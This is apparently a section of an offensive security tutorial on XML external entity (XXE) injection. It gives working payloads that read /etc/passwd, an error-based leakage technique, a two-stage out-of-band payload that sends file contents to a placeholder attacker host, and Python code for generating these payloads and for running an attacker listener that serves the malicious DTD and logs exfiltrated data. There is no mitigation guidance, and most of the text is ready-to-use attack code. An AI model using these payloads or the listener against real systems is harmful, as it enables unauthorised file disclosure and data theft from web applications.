This section covers pwning XML parsers with XML external entities (XXE) injection attacks. We can use XXE injection attacks to uncover information disclosure, server-side request forgery (SSRF), remote command injection, and remote code execution vulnerabilities in web applications.
Testing for XXE
Here’s an example of testing for XXE in a web application’s XML parser. If we provide the following input to the web application, and the internal entity lastname is used to render the output for the User element, we know we can inject XML entities for the application to process:
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Hacker">
]>
<User>
<lastName>&lastname;</lastName>
<firstName>Victim</firstName>
</User>
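The check described above can be sketched in Python. This is a minimal illustration rather than a complete tool: build_probe, entity_was_expanded, and simulate_reflecting_app are hypothetical helper names, and the "application" is simulated locally with the standard library's ElementTree parser, which expands internal entities. Against a real target, the response body would come from the application instead.

```python
import uuid
import xml.etree.ElementTree as ET


def build_probe(marker: str) -> str:
    """Return the test document with `marker` as the internal entity's value."""
    return (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE data [\n"
        "<!ELEMENT data ANY >\n"
        f'<!ENTITY lastname "{marker}">\n'
        "]>\n"
        "<User>\n"
        "<lastName>&lastname;</lastName>\n"
        "<firstName>Victim</firstName>\n"
        "</User>\n"
    )


def entity_was_expanded(response_body: str, marker: str) -> bool:
    """True if the marker appears and the raw entity reference does not."""
    return marker in response_body and "&lastname;" not in response_body


def simulate_reflecting_app(xml_text: str) -> str:
    """Hypothetical stand-in for an application that echoes lastName."""
    root = ET.fromstring(xml_text)
    return f"Hello, {root.findtext('lastName')}"


# A random marker avoids false positives from text already on the page.
marker = "xxe" + uuid.uuid4().hex
body = simulate_reflecting_app(build_probe(marker))
print(entity_was_expanded(body, marker))
```

Using a unique marker instead of a fixed word such as Hacker makes it easier to tell a real entity expansion apart from text the page would show anyway.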
Retrieving files
After verifying the vulnerability, we can use it to disclose information by declaring an external entity that points at a file on the host’s file system:
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<User>
<lastName>&lastname;</lastName>
<firstName>Victim</firstName>
</User>
We determine where this content is rendered, and then we can retrieve the contents of the file from the web application.
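As a small sketch of how this payload could be generated for different target files, the following Python helper swaps the file path into the SYSTEM identifier. The name build_file_payload is hypothetical, and the helper only builds the document; sending it and locating the rendered content depend on the application being tested.

```python
from urllib.parse import quote


def build_file_payload(path: str) -> str:
    """Return the XXE document whose external entity points at `path`."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute POSIX path")
    # Percent-encode characters that are not valid in a URI, keeping slashes.
    file_uri = "file://" + quote(path)
    return (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE data [\n"
        "<!ELEMENT data ANY >\n"
        f'<!ENTITY lastname SYSTEM "{file_uri}">\n'
        "]>\n"
        "<User>\n"
        "<lastName>&lastname;</lastName>\n"
        "<firstName>Victim</firstName>\n"
        "</User>\n"
    )


print(build_file_payload("/etc/passwd"))
```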
Error-based exploitation
If the information we’re targeting isn’t rendered by the web application in a way we can access after exploitation, we can use error-based exploitation to possibly disclose it. For example, lastname might have a maximum character length in the database the web application uses to store User records. If we request a file on the host system whose size exceeds this limit, the web application may respond with an error message that includes the rejected value, leaking the contents of the file we’re targeting.
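The mechanism can be illustrated with a toy model in Python. Everything here is an assumption made for illustration: the 20-character limit, the FieldTooLong exception, and the verbose error message are hypothetical, and an internal entity stands in for the file contents so the sketch runs without relying on a parser's external-entity support.

```python
import xml.etree.ElementTree as ET

MAX_LASTNAME_LEN = 20  # hypothetical column limit


class FieldTooLong(Exception):
    """Raised by the toy storage layer when a value does not fit."""


def store_user(last_name: str) -> None:
    if len(last_name) > MAX_LASTNAME_LEN:
        # The flaw being modeled: the error echoes the rejected value.
        raise FieldTooLong(
            f"lastName exceeds {MAX_LASTNAME_LEN} characters: {last_name!r}"
        )


def handle_request(xml_text: str) -> str:
    """Toy request handler that returns verbose errors to the client."""
    root = ET.fromstring(xml_text)
    try:
        store_user(root.findtext("lastName", default=""))
    except FieldTooLong as exc:
        return f"500 Internal Server Error: {exc}"
    return "200 OK"


# Stand-in for file contents that the parser substituted into lastName.
leaked = "root:x:0:0:root:/root:/bin/bash"
doc = (
    f'<!DOCTYPE data [<!ENTITY lastname "{leaked}">]>'
    "<User><lastName>&lastname;</lastName></User>"
)
print(handle_request(doc))
```

Whether a real application behaves this way depends on how much detail it returns in its error responses.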
Out-of-band exploitation
We can also conduct SSRF, coercing the victim machine to load external resources from our server and disclosing information when the victim executes a GET request. Here’s an example of a payload that causes the victim to request a DTD file from our server and parse it. That second stage payload then causes the victim to send a GET request that discloses the information we’re targeting.
First stage payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://IP_ADDRESS/second-stage-payload.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>
Second stage payload:
<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#x25; exfil SYSTEM 'http://IP_ADDRESS/out?%content;'>" >
The first payload requests the second stage payload, which reads the contents of the /etc/passwd file into the content parameter entity. The second stage payload then declares the exfil entity, whose URL points at our web server and embeds the contents of the file in the query string. When the victim resolves exfil, this SSRF attack leaks the contents of the file in the GET request that reaches our web server.
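Because the file’s contents are placed directly into a URL, the request often fails or arrives truncated when the file contains newlines or other characters that aren’t valid in a URL. For that reason, out-of-band exploitation of XXE vulnerabilities is usually a last resort, and not always the most effective approach.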
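The attacker-side listener for this exchange can be sketched with Python's standard http.server module. This is a minimal sketch under stated assumptions: the /second-stage-payload.dtd and /out paths and the IP_ADDRESS placeholder come from the payloads above, while second_stage_dtd, decode_exfil, OOBHandler, and serve are hypothetical names. The nested percent sign is written as the character reference &#x25;, since the XML grammar does not allow a bare percent sign inside an entity value.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

ATTACKER_HOST = "IP_ADDRESS"  # placeholder, as in the payloads above


def second_stage_dtd(host: str, target: str = "file:///etc/passwd") -> str:
    """Return the second stage DTD that defines the exfil entity."""
    return (
        f'<!ENTITY % content SYSTEM "{target}">\n'
        f"<!ENTITY % external \"<!ENTITY &#x25; exfil SYSTEM "
        f"'http://{host}/out?%content;'>\" >\n"
    )


def decode_exfil(request_path: str):
    """Return the leaked data from an /out?... request path, else None."""
    parts = urlsplit(request_path)
    if parts.path != "/out":
        return None
    return unquote(parts.query)


class OOBHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        leaked = decode_exfil(self.path)
        if leaked is not None:
            print("exfiltrated:", leaked)
            body = b""
        elif urlsplit(self.path).path == "/second-stage-payload.dtd":
            body = second_stage_dtd(ATTACKER_HOST).encode("utf-8")
        else:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(bind: str = "0.0.0.0", port: int = 80) -> None:
    """Serve the second stage and log exfiltration requests until stopped."""
    HTTPServer((bind, port), OOBHandler).serve_forever()
```

Calling serve() starts the listener. Binding to port 80 usually requires elevated privileges, so a higher port may be more practical if the payload URLs are adjusted to match.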